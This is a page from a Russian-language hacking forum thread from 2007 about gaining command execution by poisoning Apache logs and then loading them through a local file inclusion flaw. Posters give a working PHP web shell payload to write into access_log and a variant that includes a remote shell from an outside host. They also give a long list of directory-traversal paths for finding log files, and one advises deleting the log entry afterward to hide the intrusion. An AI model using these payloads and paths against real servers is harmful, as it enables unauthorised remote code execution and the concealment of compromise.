Форум АНТИЧАТ
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   access_log (https://forum.antichat.xyz/showthread.php?t=43022)

HERo!n 25.06.2007 10:10
access_log
 
Слышал что при локальном инклуде файла acces_log можно выполнять команды. Можно по подробнее ?

_Great_ 25.06.2007 10:39
Итак, ты открываешь страницу http://host.com/some_file.php?<? system($_COOKIE[cmd]);?>, только не браузером а прямой посылкой GET-запроса к серваку. Этот запрос запишется в файл access_log в том виде как он и есть. То есть там окажется способный к выполнению пхп-код.
Далее ты просто подключаешь инклудом access_log и выполняешь команды через параметр cmd из кукисов.

_Great_ 25.06.2007 10:47
ЗЫ. Ты получишь скорее всего 400 (bad request), но запись в логе останется:
Цитата:
127.0.0.1 - - [25/Jun/2007:10:45:41 +0400] "GET http://localhost/xek.php?<? system($_COOKIE[cmd]);?> HTTP/1.0" 400 406

oseLHAX 25.06.2007 10:51
лучше уж сразу записать что-то типа <? @include("http://omg.com/youshell.php"); ?>.
если инклуд удал файлов запрещен, то придется ипацо так как сказал грейтег =\

зы. и кстати лучше баловаться с error_log, ибо как правило он всегда меньше. ;)

_Great_ 25.06.2007 11:06
У меня в error_log пишется только название файла (some_file.php), а запрос к нему, в котором как раз и лежит код пхпшный, не пишется.. так что это не вариант.

Ну а насчет инклуда шелла - ну код пхпшный выбирается исходя из фантазии хеккера +) Так что будь то include или system($_COOKIE[cmd]) или что еще - это уже детали.
Да, в конце кода еще стоит дописать die; чтобы не тянуть с собой остаток лога.

Само собой, после укрепления в системе эту строчку из access.log стоит удалить ;)

slesh 28.06.2007 21:05
2 _Great_ Целый день бьюсь над тем чтобы под инклудить лог. Дык у себя на компе могу это сделать, а вот на удаленном - хоть убей не могу найти этот лог. А файл конфига - вообще не отдается. Перебрал уже кучу серваков. нигде нет лога.
P.S. серваки под пингвинами.
Пробывал:
../../../../../../../../../var/log/httpd/access_log
../../../../../../../../../var/log/httpd/access-log
../../../../../../../../../var/log/httpd/access.log
../../../../../../../../../var/log/httpd/access
Нету файлов. также вместо httpd прописывал - apache.
т.к. на некоторых серваках он завется apache, а не httpd

МОжет подскажишь как его нащупать?
Вот файл с конфигом вроде нашел. Но подинклудить не удается. на запрос типа: ../../../../../../../../../etc/httpd/conf/httpd.conf отвечает:
Код:
Warning: main(/home/****/public_html/mydir/) [function.main]: failed to open stream: Success in /home/****/public_html/mydir/index.php on line 83

Fatal error: main() [function.require]: Failed opening required '/home/****/public_html/mydir/' (include_path='.:/usr/lib/php') in /home/****/public_html/mydir/index.php on line 83

_Great_ 28.06.2007 21:22
Иногда лог лежит в /usr/local/apache/logs/access.log или подобных. Не обязательно в /var/log.

ettee 28.06.2007 21:51
PHP код:
../../../../../../../../../../../../var/log/httpd/access_log
../../../../../../../../../../../../var/log/httpd/error_log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../apache/logs/error.log
../../../../apache/logs/access.log
../../../../../apache/logs/error.log
../../../../../apache/logs/access.log
../../../../../../apache/logs/error.log
../../../../../../apache/logs/access.log
../../../../../../../apache/logs/error.log
../../../../../../../apache/logs/access.log
../../../../../../../../apache/logs/error.log
../../../../../../../../apache/logs/access.log
../../../logs/error.log
../../../logs/access.log
../../../../logs/error.log
../../../../logs/access.log
../../../../../logs/error.log
../../../../../logs/access.log
../../../../../../logs/error.log
../../../../../../logs/access.log
../../../../../../../logs/error.log
../../../../../../../logs/access.log
../../../../../../../../logs/error.log
../../../../../../../../logs/access.log
../../../../../../../../../../../../etc/httpd/logs/acces_log
../../../../../../../../../../../../etc/httpd/logs/acces.log
../../../../../../../../../../../../etc/httpd/logs/error_log
../../../../../../../../../../../../etc/httpd/logs/error.log
../../../../../../../../../../../../var/www/logs/access_log
../../../../../../../../../../../../var/www/logs/access.log
../../../../../../../../../../../../usr/local/apache/logs/access_log
../../../../../../../../../../../../usr/local/apache/logs/access.log
../../../../../../../../../../../../var/log/apache/access_log
../../../../../../../../../../../../var/log/apache/access.log
../../../../../../../../../../../../var/log/access_log
../../../../../../../../../../../../var/www/logs/error_log
../../../../../../../../../../../../var/www/logs/error.log
../../../../../../../../../../../../usr/local/apache/logs/error_log
../../../../../../../../../../../../usr/local/apache/logs/error.log
../../../../../../../../../../../../var/log/apache/error_log
../../../../../../../../../../../../var/log/apache/error.log
../../../../../../../../../../../../var/log/access_log
../../../../../../../../../../../../var/log/error_log 

re-2 28.06.2007 22:07
спосибо, давно что то похожое искал

Dread 06.07.2007 13:11
Цитата:
Сообщение от _Great_
Итак, ты открываешь страницу http://host.com/some_file.php?<? system($_COOKIE[cmd]);?>, только не браузером а прямой посылкой GET-запроса к серваку. Этот запрос запишется в файл access_log в том виде как он и есть. То есть там окажется способный к выполнению пхп-код.
Далее ты просто подключаешь инклудом access_log и выполняешь команды через параметр cmd из кукисов.
Далее ты просто подключаешь инклудом access_log и выполняешь команды через параметр cmd из кукисов.

Можно тут по подробней для такого инклуда нужно найти бажный скрипт? и как это выполнять команды и куков?


Время: 07:36
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице